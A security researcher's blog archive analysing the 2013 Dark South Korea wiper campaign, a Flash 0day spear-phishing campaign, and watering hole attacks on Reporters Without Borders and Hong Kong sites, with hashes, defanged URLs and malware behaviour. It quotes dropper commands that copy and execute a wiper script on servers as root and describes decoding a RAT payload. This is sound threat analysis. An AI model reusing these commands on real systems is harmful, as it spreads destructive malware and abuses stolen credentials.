Category Archives: Reverse Engineering

Dark South Korea Total War Review

02/04/2013Reverse EngineeringAgentBase.exe, AhnLab, alg.exe, conime.exe, HASTATI, HAURI, Korea, mRemote, PRINCIPES, SecureCRT, Trojan.Jokrawow

As mentioned by different medias, security vendors and security researchers some South Korean banks and broadcasting organizations went dark Wednesday 20 March, victim of a cyber attack. Initial impacted broadcaster were KBS, MBC and YTN, and impacted banks were Cheju, Nonghyup and Shinhan.

But by analyzing all the events related to this cyber attack we can see that the campaign was more extended in time as mentioned and also more complex to understand. The campaign is composed by different samples, created potentially by different authors with different objectives. We can divide the reported samples in different categories:

Wipe: Objective of these samples is to erase all data’s of affected targets.
Drop & Wipe: Objective of these samples is to drop a wiper to erase all data’s of affected targets.
Drop & Wipe & Deface: Objectives of these samples are to drop a wiper to erase all data’s and deface website hosted by affected targets.
Drop & Backdoor: Objective of these samples is to install a backdoor, or trojan, on the affected targets.
Unknown: These samples are potentially not related to the campaign.

I will try, through this blog post, to provide you the most reliable information’s as possible regarding the Dark South Korea campaign.

According to different sources, and announced by the South Korean security provider AhnLab the Thursday 21 March, “bad guys” got access to AhnLab Policy Center and HAURI ViRobot ISMS, asset management tools, through stolen credentials in order to massively spread Trojan.Jokra. But, regarding the latest news announced the 29 March, it seem that AhnLab APC product was vulnerable to a login authentication bypass and that this vulnerability was used by the bad guys in order to get access to APC and spread the malware.

On Wednesday 20 March, AhnLab stocks gains of 6.5 percent (75,100 KW to 80,000 KW) from stemming from expectations of demand for online security software following the hacking incident. But after the 21 March AhnLab announcement, stocks were down 3.6 percent (from 80,000 KW to 74,700 KW). Since 21 March, AhnLab stocks have fallen from 74,700 KW to 68,100 KW.

KCC reported that around 47 800 units were impacted by this cyber attack. You will find in the following graphical representation of known impacts. This graphical representation has been inspired by the work of @piyokango, a must read blog post !

Also translated from @piyokango work, the associated event timeline. Through this timeline you can better understand all the actors and impacts involved in this cyber attack.

Dark South Korea Events Timeline

Date	Time	Event
3/20	At around 2pm	Financial and broadcasting organizations computers stop suddenly and cannot restart
	2:25pm	KCC start to receive incident reports
	2:35pm	KCC & KISA confirm outages on financial and broadcasting organizations
	2:40pm	YTN TV report the incidents
	2:50pm	South Korea presidence acknowlege the incidents
	3pm	KISA raise his alert level
	3:05pm	NongHyup Bank initiate blocking measures
	At around 3pm	Shinhan bank central server is down
	At around 3pm	Cyber police announce the possibility of an attack and start the investigation
	3:10pm	South Korean army raise his alert level
	3:20pm	Shinhan bank business recovery
	4:20pm	NongHyup bank business recovery
	At around 4pm	MBC TV internal network reported as impacted
	At around 4pm	Extended opening hours after 6pm for banks
	5:49pm	AhnLab anti-virus engine is updated
	6:40pm	AhnLab distribute counter measures
	At around 9pm	KBS internal information system reported as impacted
3/21	6:30am	MBC Gyeongnam TV internal network is stopped
	7:25am	KBS TV internal network business recovery, except for PC's
	11:30am	KCC chairman visit KISA
	At around 5pm	16 NongHyup bank offices still not able to recover
3/22	At around 6am	87% of NongHyup bank cooperatives and 78% of they're ATM's have been recovered
3/22	At around 3pm	KCC report that China attribution was a mistake.
3/24	At around 6pm	NongHyup bank add some additional counter measures
3/24	At around 6pm	NongHyup bank full business recovery
3/25	At around 6am	NongHyup bank segregate internal and external network (lol)
	10:30am to 1:45pm	Time zone attacks reported and security warning raised by AnhLab
	10:30am to 1:45pm	International cooperation requested for investigations
3/26	9:21am	Additional counter measures provided by AhnLab
	9:40am	6 YTN TV affiliates overloaded by traffic
	10:40am	Network overload disrupting 8 municipalities web sites (Seoul, Gyeonggi, Incheon, Gwangju, Jeonnam, Jeonbuk, Gangwon, Jeju).
	11:22am	Network overload disrupting 7 South Korean regions.
	11:50am	Military experts join the public-private incident response task force
	00:04pm	Network failure recovery
	01:40pm to 02:30pm	Daily NK web site disrupted and posts deleted
	01:40pm to 02:30pm	Free North Korea TV web site disrupted
	02:00pm to 02:15pm	Ministries web site disrupted
	02:30pm to around 05pm	Other North Korean activists web sites disrupted
3/27	-	The Financial Services Commission announce special inspections on targeted financial institutions
3/28	-	YTN TV web site recovery
3/29	11:09am	AhnLab announce that APC was vulnerable to a authentication bypass weakness
3/29	-	Response Team announce return to normalization
Date	Time	Event

Source : piyolog (http://d.hatena.ne.jp/Kango/20130323)

The actual investigation results point that foreign source IPs ( 3 european countries and US, but not China) were discovered as potential source of the attack, and that a potential of 14 variants of the malware were discovered and analyzed.

Security firm Xecure Lab has provide some information’s regarding Dark South Korea, malwares hash are available with some detailed analysis. Also malwares samples were available on private groups and on contagio. Based on these hashes and samples, you can find here under an analysis.

Samples Analysis

Presumed Dropper(s)

MD5	9263E40D9823AECF9388B64DE34EAE54
Size	417.5 KB
Compilation timedatestamp	2013-03-20 04:07:02
Modify Date	None
File mapping object	None
Resource language(s)	English & Korean
Strings	N/A
URL	None
Other names	APCRunCmd.DRP - K10

This executable drop “AgentBase.exe” (db4bbdc36a78a8807ad9b15a562515c4), “alg.exe” (e45cd9052dd3dd502685dfd9aa2575ca), “conime.exe” (6a702342e8d9911bde134129542a045b) and “~pr1.tmp” (dc789dee20087c5e1552804492b042cd) in “%TMP%“, then execute “AgentBase.exe“. Remarks: Also known as K10 by Xecure Lab, mentioned as a wiper, but it is a dropper. This sample could be categorized as Drop & Wipe.

Also, dropped “AgentBase.exe” is known as K01 on Xecure Lab, mentioned as a wiper only. “AgentBase.exe” is a Windows wiper, but also the dropper for *NIX batch wiper aka “~pr1.tmp“. More information’s in the “9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis” chapter of this blog.

MD5	50E03200C3A0BECBF33B3788DAC8CD46
Size	24 KB
Compilation timedatestamp	2012-07-06 12:24:18
Modify Date	None
File mapping object	FFFFFFF-198468CD-6937629023-EF90000000
Resource language(s)	None
Strings	hello
URL	hxxp://www.skymom.co.kr/rgboard/addon/update/update_body.jpg
Other names	K06

It seem that “update_body.jpg” (a03ae3a480dd17134b04dbc5e62bf57b), first seen the 2012-08-28 04:31:52, is the same as mentioned on SCUMWARE the 2012-08-30. You can find this sample on malware.lu. Symantec and McAfee have try to create a relation based on the used packer and on some common compilation paths. But like McAfee, I don’t see any relations between this dropper and the 03.20 Dark South Korea campaign. Known as K06 on Xecure Lab. This sample could be categorized as Drop & Backdoor, or Unknown.

MD5	E4F66C3CD27B97649976F6F0DAAD9032
Size	24 KB
Compilation timedatestamp	2012-07-06 12:24:18
Modify Date	None
File mapping object	FFFFFFF-198468CD-6937629023-EF90000000
Resource language(s)	None
Strings	hello
URL	hxxp://www.anulaibar.com/e107/e107_files/js/e107_001.cab
Other names	K05

Here also, I don’t see any relations between this dropper and the 03.20 Dark South Korea campaign. Known as K05 on Xecure Lab and mentioned by McAfee. This sample could be categorized as Drop & Backdoor, or Unknown.

MD5	2F9AF723E807FF44C2684E5D644EBE46
Size	38.8 KB
Compilation timedatestamp	None
Modify Date	2013:03:17 23:41:07
File mapping object	None
Resource language(s)	None
Strings	None
URL	None
Other names	고객계좌내역.rar - K08

Known as K08 on xsecure-lab.com, and like the guys of Xecure Lab. I don’t see any relations between this dropper and the 03.20 Dark South Korea campaign. F-Secure has try to link this sample to the campaign. This sample could be categorized as Unknown.

MD5	530c95eccdbd1416bf2655412e3dddb
Size	Unknown
Compilation timedatestamp	Unknown
Modify Date	None
File mapping object	Unknown
Resource language(s)	Unknown
Strings	HASTATI. / PR!NCPES and other unknowns
URL	Unknown
Other names	Unknown

This sample was mentioned by Symantec and AhnLab the 23 March. Particularities of this sample is that he will drop 2 files and inject 1 the files into “LSASS.exe” process as a DLL. Also this sample will be executed any years the 20 March at 2pm and wipe MBR with “HASTATI.” and “PR!NCPES” strings. Unfortunately I wasn’t able to find this sample. This sample could be categorized as Drop & Wipe.

MD5	e823221609b37e99fbbce5b493a02f68
Size	236.0 KB
Compilation timedatestamp	2013-03-19 23:57:06
Modify Date	None
File mapping object	None
Resource language(s)	Korean
Strings	MICRO_ESENCIAL0192301 / Alerter / Sens / Hacked By Whois Team / morpsntls.exe / and bunch of others
URL	None
Other names	cmsvrts.exe / K07

This sample was also mentioned the 20 March by different medias, security vendors and researchers. He was used to against LG UPlus Corp showed a page that said it had been hacked by a group calling itself the “Whois Team“.

Particularities of this sample is that he seem to be triggered only in certain conditions, and this condition seem to be related to certain time zone, as mentioned by AhnLab the 23 March. The sample drop “mp.swf“, “lf.mp3“, “24mhk04.gif“, “25z18pg.jpg” files, adds “MICRO_ESENCIAL0192301” as mutex, modify the “SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management” following registry entries, overwrite all “.html“, “.htm“, “.aspx“, “.asp“, “.jsp“, “.do“, “.php” files with its code, terminate Windows Alerter service (Alerter) and Windows System Event Notification Service (Sens), and drop all the MBR datas. This sample could be categorized as Drop & Wipe & Deface.

Presumed Wiper(s)

Symantec, Tripwire, Xecure Lab and contagio reported hashes of different wipers. Here under an analysis of these wipers with some corrections.

MD5	0a8032cd6b4a710b1771a080fa09fb87
Size	24 KB
Compilation timedatestamp	2013-01-31 10:27:18
File mapping object	JO840112-CRAS8468-11150923-PCI8273V
Strings	PR!NCPES / HASTATI. / \Temp\~v3.log
Check "~v3.log"	No
Task kill	pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot)
Wiper timing	Immediate
Shutdown	shutdown -r -t 0
Other names	mb_join.gif / mb_join.exe / K03
Mentioned by	contagio & Symantec

Despite file “~v3.log” is present in “C:\WINDOWS\Temp\” directory, the wiper is running directly. This sample could be categorized as Wiper.

MD5	5fcd6e1dace6b0599429d913850f0364
Size	24 KB
Compilation timedatestamp	2013-01-31 10:27:18
File mapping object	JO840112-CRAS8468-11150923-PCI8273V
Strings	HASTATI.
Check "~v3.log"	No
Task kill	pasvc.exe (AhnLab Policy Agent) / Clisvc.exe (Hauri ViRobot)
Wiper timing	Immediate
Shutdown	shutdown -r -t 0
Other names	AmAgent.exe / OthDown.exe / K04
Mentioned by	contagio & Symantec & Tripwire

This sample could be categorized as Wiper.

MD5	db4bbdc36a78a8807ad9b15a562515c4
Size	24 KB
Compilation timedatestamp	2013-01-31 10:27:18
File mapping object	JO840112-CRAS8468-11150923-PCI8273V
Strings	PRINCPES / HASTATI. / \Temp\~v3.log
Check "~v3.log"	Yes
Task kill	pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot)
Wiper timing	Not immediate if ~v3.log is present
Shutdown	shutdown -r -t 0
Other names	ApcRunCmd.exe / K01
Mentioned by	contagio & Symantec & Tripwire

This sample is taking care of the “~v3.log” presence in “C:\WINDOWS\Temp\” directory. If the file is present the wipe process is not started. This sample could be categorized as Wiper.

But you have to take in consideration that this sample is normally executed by 9263E40D9823AECF9388B64DE34EAE54 dropper, and that a complete process will be analyzed in the “9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis” chapter of this blog.

MD5	f0e045210e3258dad91d7b6b4d64e7f3
Size	24 KB
Compilation timedatestamp	2013-01-31 10:27:18
File mapping object	JO840112-CRAS8468-11150923-PCI8273V
Strings	PRINCPES / HASTATI. / \Temp\~v3.log
Check "~v3.log"	Yes
Task kill	pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot)
Wiper timing	Not immediate if ~v3.log is present
Shutdown	shutdown -r -t 0
Other names	ApcRunCmd.exe / K02
Mentioned by	contagio

Like the previous wiper, if “~v3.log” is present in “C:\WINDOWS\Temp\” directory, the wipe process is not started.

This sample seems also to be part of a another dropper actually not publicly known. This sample could be categorized as Wiper.

As you can see, all of the wipers use the “HASTATI” string in order to overwrite MBR data’s. As reported by security vendors, “Hastati” term refers to a class of infantry in the armies of the early Roman Republic. “PRINCPES” term, also used to overwrite MBR data’s, could also refer to the “Principes” who were veteran soldiers of the Roman Pre-Marian Army. Are the “bad guys” fan of Roman Army, or fan of Total War game ?

Also an interesting relation between the “HASTATI” string used to overwrite MBR data’s, is that KBS TV website was defaced the 21 March with a “Defaced by HASTATI” message and symbol representing the class of infantry in the armies of the early Roman Republic.

9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis

In this chapter of this long blog post we will analyze some behaviors of 9263e40d9823aecf9388b64de34eae54 dropper.

As mentioned by different security vendors or researchers, when executed the dropper will extract 4 files into Windows “%TMP%” directory. These files are “alg.exe“, “conime.exe“, “~pr1.tmp” and “AgentBase.exe“.

“alg.exe” (e45cd9052dd3dd502685dfd9aa2575ca) is the “plink.exe” PuTTY tool acting as a command-line interface to the PuTTY back ends. This binary has been compiled the 2013-02-15 at 08:12:58.

“conime.exe” (6a702342e8d9911bde134129542a045b) is the “pscp.exe” PuTTY tool acting as a SCP client, i.e. command-line secure file copy. This binary has been compiled the 2006-03-13 at 14:32:44.

“~pr1.tmp” (dc789dee20087c5e1552804492b042cd) is a bash script who will be dropped and executed on *NIX servers in certain conditions.

“AgentBase.exe” (db4bbdc36a78a8807ad9b15a562515c4) is the wiper mentioned in the previous chapters of this blog post.

After installing these files, the dropper will check the presence of “~v3.log” file in “C:\WINDOWS\Temp\” directory.

If the file “~v3.log” is not existing “AgentBase.exe” wiper will be executed, killing AhnLab Policy Agent (pasvc.exe) and Hauri ViRobot ISMS Client (clisvc.exe), then erasing all data’s.

If the file “~v3.log” is existing, the dropper start to check the presence of configuration file “confCons.xml” of mRemote program, developed by Felix Deimel, and the presence of configuration files of SecureCRT program, developed by VanDyke Software, Inc.

For mRemote, the dropper copy all data’s, related to SSH connexions with root login, present in “confCons.xml” configuration file and exploit a vulnerability present in the password storage engine of this program. When you save connections in mRemote it outputs all of that data into an XML report “confCons.xml“. The passwords are saved in an encrypted format, however this is trivial to circumvent. So despite the passwords are saved in encrypted format it is easy to decrypt them. This vulnerability was discovered and published by Cosine Security the 2 Jun 2011. Support of mRemote has been stopped in 2012.

Once the mRemote vulnerability is exploited, the dropper start a new process to execute “conime.exe” binary, in order to drop the “~pr1.tmp” file into “/tmp/cups” on the targeted server:

“C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe -batch -P 22 -l root -pw test C:\Users\ERICRO~1\AppData\Local\Temp\~pr1.tmp 192.168.178.54:/tmp/cups”

After upload of “cups” file, the dropper will execute this file through the following command.

“C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe -batch -P 22 -l root -pw test 192.168.178.54 “chmod 755 /tmp/cups;/tmp/cups”

For SecureCRT, the dropper is also copying all data’s, related to SSH connexions with root login, present in “*.ini” configuration files. Each saved connection in SecureCRT as it ones “*.ini” file who will be parsed by the dropper. The passwords are also saved in an encrypted format.

With the latest version of SecureCRT (7.0.3), the dropper is unable to decrypt the password, but will try to connect to targeted servers with a wrong password. So there is surely a similar vulnerability as for mRemote in previous versions of SecureCRT, but wasn’t able to find it.

Boeing-job.com Campaign and Adobe Flash 0days Additional Informations

10/02/2013Log Management, Reverse Engineering, Vulnerability ManagementAdobe, Adobe Flash 0day, ADP, APSB13-04, Boeing, CVE-2013-0633, CVE-2013-0634, Flash, Flash 0day, IEEE, Jsbugwow

The 7 February, Adobe has issue security bulletin APSB13-04 for Adobe Flash Player, in order address two vulnerabilities, CVE-2013-0633 and CVE-2013-0634, exploited in the wild.

CVE-2013-0633 (CVSS base score of 9.3) is exploited by tricking a Windows user to open a Microsoft Word document containing a malicious Flash content. CVE-2013-0634 (CVSS base score of 9.3) is exploited by tricking an Apple OS X user to open a web page, containing a malicious Flash content, through Firefox or Safari. But this vulnerability is also exploited by tricking a Windows user to open a Microsoft Word document containing a malicious Flash content.

Affected products are :

Adobe Flash Player 11.5.502.146 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.261 and earlier versions for Linux
Adobe Flash Player 11.1.115.36 and earlier versions for Android 4.x
Adobe Flash Player 11.1.111.31 and earlier versions for Android 3.x and 2.x

These vulnerabilities were discovered exploited in the wild:

For CVE-2013-0633, by Sergey Golovanov and Alexander Polyakov of Kaspersky Labs
For CVE-2013-0634, by Shadowserver Foundation, MITRE and Lockheed Martin CIRT

As described by Alienvault Labs and by FireEye, the vulnerabilities were exploited through spear phishing email messages targeting several industries including the aerospace one. One of the e-email attached file was using the 2013 IEEE Aerospace Conference schedule, and another reported sample was related to online payroll system of ADP US company.

Detailed analysis have been provided by Alienvault Labs, FireEye and Malware Must Die. All the analysis reported the following domain name ieee[.]boeing-job[.]com as C&C server.

boeing-job[.]com domain name was registered the 22 January 2013, through GoDaddy, with fake registration information’s.

The 5 February http://ieee[.]boeing-job[.]com sub domain was pointing to IP 108.62.10.13, AS15003 in US.
The 6 February http://boeing-job[.]com was pointing to IP 184.168.221.37, AS26496 in US, parking web page of GoDaddy.

But, they’re is always a but, if you take a look in Google you can find the IP address who was used for www.boeing-job[.]com.

This sub domain was pointing to a legit website http://www[.]grupo-gestion[.]com[.]ar, IP 200.123.160.138, AS16814 in Argentina.

By searching on urlQuery, you can find a submission, the 5 February, with this IP. And suprise this submission is regarding a “record.doc” document located in a “/adp/” directory. So we have the ADP word document. Also urlQuery is reporting an alert “FILE-OFFICE Microsoft Office Word with embedded Flash file transfer” regarding the “record.doc” document.

Now let analyze further this server used in the spear phishing campaign. By doing some researches on Google, you will quickly find that weak tools are present on the server and that these tools are freely accessible from Internet…. After some further analysis, we can find that an old default XAMPP installation is present on this server, and that bad guys have use this weakness in order to install PHP backdoor. The PHP backdoor were also not protected giving full access to the server.

The related “/adp/” directory is empty of the “record.doc” file and most of the server seem to have been cleaned.

But, I discovered an interesting “/jobs/” directory containing a well-known tool, JSbug statistics backend, used in previous drive-by attacks campaign. The contents of the backend allow us to see that a campaign was started since the 22 January by using www.boeing-job[.]com domain name.

Also, what is interesting, is that the XAMPP Apache log files were accessible from Internet, without restrictions.

By doing some log analysis we can find the following information’s:

“record.doc” file size was 563200 bytes.
First, 200 Apache return code, access to “/adp/record.doc” file was recorded the 05/Feb/2013:07:12:24 -0300.
“/adp/record.doc” file was removed from the server around the 08/Feb/2013 09:23:24 -0300.
Around 300 accesses on the “record.doc” files were done during this timeframe. 42 the 5 February, 7 the 6 February, 89 the 7 February and 161 the 8 February.
A PHP backdoor was present on the server since the 05/Nov/2012 and used multiple times.
A second PHP backdoor was uploaded on the server the 8 February, at 08/Feb/2013 02:25:25 -0300 (surely used to remove the record.doc file). Why not using the first PHP backdoor ? Surely cause you are not the guy who has deposit the “record.doc” file and you don’t know the existence of the first PHP backdoor.
The server was scanned during two days with Acunetix, starting the 02/Feb/2013 18:25:45 -0300

Additional analysis of the discovered “/jobs/” and JSbug backend directory provide the following interesting information’s:

The “/jobs/” directory was first seen the 22/Jan/2013 06:12:44 -0300
Installation of JSBug backend was done the 22/Jan/2013 06:13:16 -0300
Additional files were installed in the “/jobs/” directory like “img/jquery-1.8.3.min.js“, “img/logo.gif“, “check.php”, “download.htm“, “download.php“, “img/download.css“, “img/ff_step1.png“, “img/ie_step3.png“, “img/ff_step2.png” and “NProtect.exe“. “check.php“, “download.htm“, “NProtect.exe” and “download.php” are no more present on the server.

By analysing the file remaining on the server, and used in a previous attack, who has start the 22 January, we can see the following files who reveal that a spear phishing campaign was done against Boeing employees, in order to trick them to install the “NProtect.exe” malware.

logo file founded on the server

Reporters Without Borders Victim of Watering Hole Campaign

22/01/2013Reverse EngineeringAppletHigh.jar, AppletLow.jar, CVE-2012-4792, DOITYOUR01.txt, DOITYOUR02.html, Internet Explorer, Internet Explorer 0day, Java, KB 2799329, logo1229.swf, Microsoft, MS13-008, Oracle, Oracle Java 0day, Reporter Sans Frontieres, Reporters Without Borders, RSF, RWB, Somethingbbbbb, Somethingeeeewow

As mentioned by Jindrich on Twitter, it seems that the entity or entities behind the watering hole attacks don’t care to be caught or detected and it also seems that they don’t care if the Internet Explorer and Java vulnerability are patched. They act as the opportunists and try to take advantage from the timeframe between the patch release and the patch application of some users, companies and non-governmental organizations.

Watering hole attacks still continue -now spotted only on human rights sites -another Tibetian one, HK, chinese, and … wait for it… RSF!

— Jindrich Kubec (@Jindroush) January 22, 2013

We've seen the first infection on RSF yesterday, then it vanished,but it's back there,which suggest attackers have full access to their site

— Jindrich Kubec (@Jindroush) January 22, 2013

Last week me and Jindrich Kubec reported on watering hole attacks against multiple high value web sites, including as example major Hong Kong political parties. These websites used the latest Internet Explorer (CVE-2012-4792) vulnerability, patched in MS13-008, but also the latest Java (CVE-2013-0422) vulnerability, patched in Oracle Java 7 Update 11.

It seems that one week later, Reporters Without Borders, a French-based international non-governmental organization that advocates freedom of the press and freedom of information, is the new web site used for the watering hole campaign. Such an organization is an ideal target for watering hole campaign, as it seems right now the miscreants concentrate only on human rights/political sites – many Tibetian, some Uygur, and some political parties in Hong Kong and Taiwan which are the latest hits in this operation. In our opinion the finger could be safely pointed to China (again).

Like for the Hong Kong political party, the english version of RWB was doing a javascript inclusion to “hxxp://en.rsf.org/local/cache-js/m.js“.

The “m.js” file creates a cookie “Somethingbbbbb” with one day expiration date. The cookie name could be linked to the Hong Kong political party “m.js” cookie name which was “Somethingeeee“. This kind of cookies was already used two years ago in similar attacks with different exploits.

If Internet Explorer 8 is used an iframe is loaded from”hxxp://newsite.acmetoy.com/m/d/pdf.html” file. Otherwise two iframes will load “hxxp://98.129.194.210/CFIDE/debug/includes/java.html“ and “hxxp://newsite.acmetoy.com/m/d/javapdf.html“.

newsite.acmetoy.com analysis

“newsite.acmetoy.com” web site is hosting the following CVE-2012-4792 related files:

“pdf.html” (ffe715a312a488daf3310712366a5024) : Traditional “DOITYOUR” obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792.
“logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f) : Traditional “DOITYOUR” variant of “today.swf“.
“DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) : Traditional “DOITYOUR” variant of “news.html“.
“DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0) : Traditional “DOITYOUR” variant of “robots.txt“.

“newsite.acmetoy.com” web site is also hosting the following Java vulnerabilities related files:

“javapdf.html” (b32bf36160c7a3cc5bc765672f7d6f2c) : Javascript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
“AppletHigh.jar” (f02ffa2b293ff370d0ea3499d0ade9bd) : CVE-2013-0422 exploit.
“AppletLow.jar” (1da8f77dde43f55585896eddaff43896) : CVE-2011-3544 exploit.

98.129.194.210 analysis

“98.129.194.210” web site is hosting the following Java vulnerabilities related files, as you can see, they’re completely same as the above and most probably serve only as a backup server in case of takedown.

“java.html” (b32bf36160c7a3cc5bc765672f7d6f2c) : Javascript file for CVE-2013-0422 or CVE-2011-3544 exploitation.
“AppletHigh.jar” (f02ffa2b293ff370d0ea3499d0ade9bd) : CVE-2013-0422 exploit.
“AppletLow.jar” (1da8f77dde43f55585896eddaff43896) : CVE-2011-3544 exploit.

These binaries were dropped by the exploits :

686D0E4FAEE4B0EF93A8B9550BD544BF334A6D9B495EC7BE9E28A0F681F5495C, which is remote access tool (RAT) programmed to contact “luckmevnc.myvnc.com” (112.140.186.252, Singapore) or “luckmegame.servegame.com” (currently parked).
A14CCC5922EFC6C7CEC1BB58C607381C99967ED4B7602B7427B081209AAF1656 is an interesting injector which downloads something which pretends to be an error webpage, decodes its content which is in fact position independent code which is later injected to another process. This is also RAT, contacting “d.wt.ikwb.com” (58.64.179.139, Hong Kong).

We’ve contacted RSF webmaster and the code should be already removed. Avast and other anti-virus product users are protected on multiple levels against this threat, also updating to latest versions of the vulnerable software packages is a must. Or getting rid of them, as most users can safely replace MSIE with another browser and completely uninstalling Java, reducing the attack surface.

Watering Hole Campaign Use Latest Java and IE Vulnerabilities

15/01/2013Reverse EngineeringAppletHigh.jar, AppletLow.jar, APT, CFR, Council on Foreign Relations, CVE-2011-3544, CVE-2012-4792, CVE-2013-0422, DOITYOUR01.txt, DOITYOUR02.html, Internet Explorer, Internet Explorer 0day, Java, Java 0day, Java SE 6, Java SE 7, KB 2799329, logo1229.swf, Microsoft, MS13-008, Oracle, Oracle Java 0day, Reporter Sans Frontieres, Reporters Without Borders, RSF, RWB, Somethingeeeewow

Through a collaboration with (Jindrich Kubec (@Jindroush), Director of Threat Intelligence at avast! / Eric Romang (@eromang), independent security researcher), we can confirm that the watering hole campaigns are still ongoing, targeting multiple web high value web sites, including as example a major Hong Kong political party. We can also confirm that a second major Hong Kong political party is victim of this watering hole campaign.

This website is actually using the new version of the original Internet Explorer (CVE-2012-4792) vulnerability attack, patched in MS13-008, but right now it’s also using the latest Java (CVE-2013-0422) vulnerability, patched in Oracle Java 7 Update 11.

We will provide you further details on the affected web sites after their cleaning.

Chinese language version of the targeted web site is doing a remote javascript inclusion to “hxxp://www.[REDACTED].org/board/data/m/m.js“.

This website is a legitimate compromised website used for hosting the exploit files, hosted in South Korea.

This include file uses the well-known “deployJava” function, aka “deployJava.js“, and creates a cookie “Somethingeeee” with one day expiration date. This cookie is quite strange and it’s also possible to find it in years old exploits, which suggests this is only a part of greater, long-going operation.

If Internet Explorer 8 is used , an iframe is load from”hxxp://www.[REDACTED].org/board/data/m/mt.html” file. Otherwise and if Oracle Java is detected, an iframe will load “hxxp://www.[REDACTED].org/board/data/m/javamt.html“.

Analysis of “mt.html“

“mt.html” (d85e34827980b13c9244cbcab13b35ea) file is an obfuscated Javascript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792, fixed in MS13-008 and provided by Microsoft Monday morning.

https://www.virustotal.com/file/58588ce6d0a1e042450946b03fa4cd92ac1b4246cb6879a7f50a0aab2a84086a/analysis/ (avast detects this code as JS:Bogidow-A [Expl] through Script Shield component).

Comparing to the original CFR and Capstone Turbine versions, this code is not targeting certain browser supported language, but the code is based on the version used on CFR with “boy” and “girl” patterns.

Traditional “today.swf” has been replaced with “logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f), “news.html” has been replaced with “DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) and “robots.txt” has been replaced with “DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0). The traditional dropper “xsainfo.jpg” is now embedded in the “mt.html” file and obfuscated in the Javascript.

The executable file can be extracted from the string by cutting of first 13 characters, converting hex chars to binary and xoring the whole binary blob with 0xBF. Resulting file with SHA256 CE6C5D2DCF5E9BDECBF15E95943F4FFA845F8F07ED2D10FD6E544F30A9353AD2 is RAT which is communicating with a domain hosted in Hong Kong by New World Telecom.

Analysis of “javamt.html“

“javamt.html” (b32bf36160c7a3cc5bc765672f7d6f2c) is checking if Oracle Java 7 is present, if yes latest Java vulnerability, CVE-2013-0422, will be executed through “AppletHigh.jar” (521eab796271254793280746dbfd9951). If Oracle Java 6 is present, “AppletLow.jar” (2062203f0ecdaf60df34b5bdfd8eacdc) will exploit CVE-2011-3544. Both these applets contain the very same binary mentioned above (unencrypted).

Conclusion

As you see, the watering hole campaign still continues, but has evolved in form but also by using the latest Oracle Java vulnerability. There is just one advise: patch, patch, patch… and see you soon.

Eric Romang Blog

aka wow on ZATAZ.com